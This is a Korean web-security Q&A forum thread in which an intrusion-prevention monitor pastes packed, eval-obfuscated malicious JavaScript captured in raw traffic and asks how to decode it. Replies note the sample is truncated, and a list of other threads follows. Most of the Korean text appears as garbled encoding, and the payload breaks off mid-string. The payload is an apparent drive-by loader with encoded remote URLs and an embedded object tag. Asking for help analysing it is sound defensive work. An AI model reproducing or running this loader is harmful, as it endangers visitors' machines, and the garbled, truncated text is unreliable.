214, 8/11 ȸ¿ø°¡ÀÔ  ·Î±×ÀΠ 
   yeastblue
   eval¿¡ ´ëÇؼ­

http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_Web&no=77 [º¹»ç]


¾È³çÇϼ¼¿ä. IPS ¸ð´ÏÅ͸µÇÏ°í Àִ»ç¶÷ÀÔ´Ï´Ù. ¾î´À³¯ raw data¸¦ º¸´Ï eval·Î µÈ malicious javascript °ø°ÝÀÌ Áö¼ÓÀûÀ¸·Î µé¾î¿À´õ±º¿ä.  Src Ip°¡ Áö¼ÓÀûÀ¸·Î malicious javascript°¡ ÇÏ·ç¿¡ ¸îõ°Ç¾¿ µé¾î¿À°í ÀÖ½À´Ï´Ù. ¹®Á¦´Â ¹ØÀÇ raw data¸¦ µðÄÚµùÇÏ´Â °ÍÀε¥ deanÀÌ ¸¸µç malicious javascript °ø°ÝÀÌ ²Ï ºÐ¼®Çϱ⠾î·Æ´õ±º¿ä. Á˼ÛÇÏÁö¸¸ ¹ØÀÇ raw dataÀÇ µðÄÚµùÇÏ´Â ¹ýÁ» °¡¸£ÃÄ ÁֽʽÿÀ. ¤Ð.¤Ð alert´Â ÀÌ¹Ì ½áº¸¾Ò½À´Ï´Ù. ÇÏÁö¸¸ À߸øµÈ Àü¼ÛÀ̶ó¸é¼­ ¿¡·¯¸Þ½ÃÁö Æ˾÷âÀÌ ¶å´Ï´Ù.
=>eval(function(p,a,c,k,e,d)
{
        e=function(c)
        {
                return(c<a?'':e(parseInt(c/a)))+((c=c%a)35? String.fromCharCode(c+29):c.toString(36))
        };
if(!''.replace(/^/,String))
{
        while(c--)
        {
                d[e(c)]=k[c]||e(c)
        }
k=[function(e){        return d[e]}];e=function(){return'\\w+'};c=1};while(c--)
{
if(k[c])
        {
                p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])
        }
}
return p
}
('3 1w="b://O.p.k/I/";3 1x=[];3 K=1y D();K[0]=D("1u","0","2","",1,1r,0,0,1s,1t,0,"1z","1A","1G",1,0.4,"1H",1);3 1I=D("1E.c","E.c","H");3 B=[];3 z=[];3 A=[];3 F=[];3 y=[];3 G=[];B[0]="b://1B.p.k/1C/1D.1q?t=1p";z[0]="1c.c";A[0]="b://1d.1e.L/1b/?1a";F[0]="E.c";y[0]="H";G[0]="J";B[1]="b://17.18.19.L/1g.1m?1n=1o&1l=1k";z[1]="1i.c";A[1]="#";F[1]="E.c";y[1]="H";G[1]="J";3 24=25;3 2a=j;3 2b,2j;3 2h;P N(){u(!f.S("l")){3 a=f.2g("9");a.5="l";f.2f.2d(a);a.e.d=1;a.e.g=1;a.e.21="1Q"}3 i="ɡ 5=\\"1R\\" >";i+=M(\'b://O.p.k/I/1N.1S\',\'R\',\'R\',\'1Z\',\'\',\'\',\'20\');i+="</9>";3 r=f.S(\'l\');u(r){r.1U=i}}P M(v,w,h,5,q,s,o){u(1M.2e=="2c 29 1j"){3 n="<Q 1T=\'C j\' 2i=\'1W:1V-1X-1Y-1L-1O\' 15=\'12/x-11-10\' g=\'"+w+"\' d=\'"+h+"\' 5=\'"+5+"\' 6=\'"+5+"\' Y=\'Z\'>"+"ɠ 6=\'23\' 7=\'"+v+"\' />"+"ɠ 6=\'14\' 7=\'"+s+"\' />"+"ɠ 6=\'X\' 7=\'"+o+"\' />"+"ɠ 6=\'6\' 7=\'"+5+"\' />"+"ɠ 6=\'W\' 7=\'j\' />"+"ɠ 6=\'V\' 7=\'T\' />"+"ɠ 6=\'27\'7=\'13\' /

  Hit : 3251     Date : 2011/10/05 12:29



    
xzvsda ¼Ò½º ©¸°°Å °°Àºµ¥ ¿øº»À» ÷ºÎÆÄÀÏ·Î ¿Ã·ÁÁÖ¼¼¿ä 2011/10/05  
yeastblue ¿ª½Ã ©¸°°Í ¸ÂÁÒ?.¤Ð.¤Ð IPS¿¡¼­ ³ª¿Â raw data ÀÔ´Ï´Ù. ÷ºÎÆÄÀÏÀÌ ¾ø¾î¿ä.¤Ð.¤Ð ÇØ´ç Src IP¸¦ °¡µµ ÁغñÁßÀÔ´Ï´Ù.¸¸ Ç¥½ÃµÇ´Âµ¥ Src IP°¡ ¿©·¯±ºµ¥¿¡¼­ ¶È°°ÀÌ ÁغñÁßÀÔ´Ï´Ù¸¸ µÇ¾î ÀÖ½À´Ï´Ù.¤Ð.¤Ð À§¿¡ ºÎºÐ ©¸°ºÎºÐÀÌ¶óµµ Çؼ®ÀÌ ¾î´ÀÁ¤µµ °¡´ÉÇÑ°¡¿ä?.¤Ð.¤Ð 2011/10/05  
rocket07 ¸Û°¡ ÀÌ°Ç!! ¤¾¤¾ ±î¸®ÇÏ´Ù 2012/01/21  
74   ¾È³çÇϼ¼¿ä~ ¿À´Ã netcat ·Î ȸ»çÄÄÇ»ÅÍ ÇØÅ·°øºÎÇϴµ¥¿ä[2]     xfindcokr
03/17 3797
73   hackthissite.org ÀÇ basic 2¹ø¹®Á¦..[3]     $Zero
03/15 3148
72   À¥ÇØÅ· °øºÎ¼ø¼­¸¦ ¾Ë·ÁÁÖ¼¼¿ä..[2]     nooooooob
02/28 4653
71   sslstripÀ¸·Î Æ®À§ÅÍ ½º´ÏÇÎ Çغ»½ÅºÐ ÀÖ³ª¿ä?     Å×Ã÷
02/21 3319
70   À¥ÇØÅ·ÂÊÀ¸·Î ³ª°¡°í ½ÍÀº ÇлýÀä..[4]     ¾Øµðij·Ñ
02/03 3701
69   À¥ÇØÅ·ÂÊÀ¸·Î ³ª°¡·Á´Â °íµùÀ©...[1]     lys105
01/28 3147
68   À¥ÇØÅ·À» °øºÎÇÏ°í ½ÍÀºµ¥¿ä ¹¹ºÎÅÍ °øºÎÇؾߵɱî¿ä??[2]     kkkod1150
01/27 3158
67   »ó´ë¹æ¿¡°Ô URLÀ» º¸³»´Â ¹æ¹ý[1]     ddr4869
01/20 3635
66   Áú¹®ÀÔ´Ï´Ù.     jsw2604
12/27 2735
65   ¹®µæ ¶°¿À¸¥ Àǹ®Á¡ ÇϳªÀÔ´Ï´Ù!![1]     »ç¶û°ú·Î¸Á
12/07 3136
64   ÄÄÇ»ÅÍ¿¡ ´ëÇØ Ã³À½¹è¿ì´Âµ¥ ÇØÅ·¸ÕÀú ¹è¿öµµ µÇ·ÃÁö?[2]     hacker17
11/17 3429
63   º¸¾È ±¸ÃàÀ» ¾î¶»°Ô ÇؾßÁö¿ä?[2]     hajunggu
11/13 3316
62   ´ëÇб³ÀÇ À¥ÇØÅ·°ü·ÃÇÏ¿© Á¤º¸¸¦ ¾ò°íÀÚ Çϴµ¥[2]     han0205
11/05 3107
61   À¥ÇØÅ· ¹¹ºÎÅÍ....[3]     abnavv
11/04 3478
60   wpe°°Àº ÇÁ·Î±×·¥ÀÇ ¿ø¸®¸¦ ÀÌÇØÇÏ·Á¸é..[1]     attainer
11/01 4285
  eval¿¡ ´ëÇؼ­[3]     yeastblue
10/05 3250
58   ¾÷·Îµå Ãë¾àÁ¡ ÀçÁú¹®[1]     Sk1y
09/14 3291
57   sql injectionÀä[3]     kangms0801
09/03 3691
56   ¾÷·Îµå Ãë¾àÁ¡¿¡¼­[3]     Sk1y
08/16 3481
55   À¥¼­¹ö ¿¬°á¹æ¹ý[1]     °¡¸é¼ÓÀǹ̼Ò
08/15 4058
[1][2][3][4][5][6][7] 8 [9][10]..[11]

Copyright 1999-2024 Zeroboard / skin by Hackerschool.org / Secure Patch by Hackerschool.org